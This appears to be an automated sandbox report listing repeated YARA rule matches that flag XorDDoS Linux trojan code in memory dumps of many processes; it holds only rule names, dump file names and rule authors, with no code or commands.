Source: 9772.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 9772.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 10148.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 10148.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 10148.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 10280.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 10280.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 10280.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 10291.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 10291.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 10291.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 9948.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 9948.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 9948.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 9662.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 9662.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 9662.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 10346.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 10346.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 10346.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 9739.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 9739.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 9739.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 10093.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 10093.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 10093.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 10104.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 10104.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 10104.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 9462.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 9462.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 9462.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 10005.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 10005.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 10005.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 9454.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 9454.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 9454.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 10016.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 10016.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 10016.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 9651.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 9651.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 9651.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 9629.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 9629.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 9629.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 9585.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 9585.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 9585.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 9959.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 9959.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 9959.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 10269.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 10269.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 10269.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 10258.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 10258.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 10258.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 9816.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 9816.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 9816.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 10324.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 10324.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 10324.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 9563.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 9563.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 9563.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 9926.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 9926.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 9926.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 9871.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 9871.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 9871.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 10247.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 10247.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 10247.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 10115.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 10115.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 10115.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 10214.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 10214.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 10214.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 9596.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 9596.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 9596.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 10192.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 10192.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 10192.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 9794.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 9794.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 9794.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 9695.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 9695.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 9695.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 10390.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 10390.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 10390.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 9706.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 9706.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 9706.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 10137.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 10137.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 10137.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 9640.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 9640.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 9640.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 9552.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 9552.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 9552.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 9457.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 9457.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 9457.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 10379.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 10379.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 10379.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 9915.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 9915.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 9915.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 9728.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 9728.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 9728.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 10082.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 10082.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 10082.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 10313.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 10313.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 10313.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 9937.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 9937.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 9937.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 10060.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 10060.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 10060.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 9882.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 9882.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 9882.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 9827.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 9827.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 9827.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 9893.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 9893.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 9893.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 10038.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 10038.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 10038.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 9849.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 9849.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 9849.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 10203.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 10203.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 10203.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 9970.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 9970.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 9970.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 10126.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 10126.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 10126.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 10357.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 10357.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 10357.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 9783.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 9783.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 9783.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 10335.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 10335.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 10335.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 10049.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 10049.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 10049.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 9994.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 9994.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 9994.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 10302.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 10302.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 10302.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 9673.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 9673.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 9673.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 10236.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 10236.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 10236.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 10170.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 10170.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 10170.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 9717.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 9717.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 9717.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 9618.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 9618.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 9618.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 9805.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 9805.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 9805.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 9574.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 9574.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 9574.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 9451.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 9451.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 9451.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 9981.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 9981.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 9981.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 9860.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 9860.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 9860.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 10434.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 10434.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
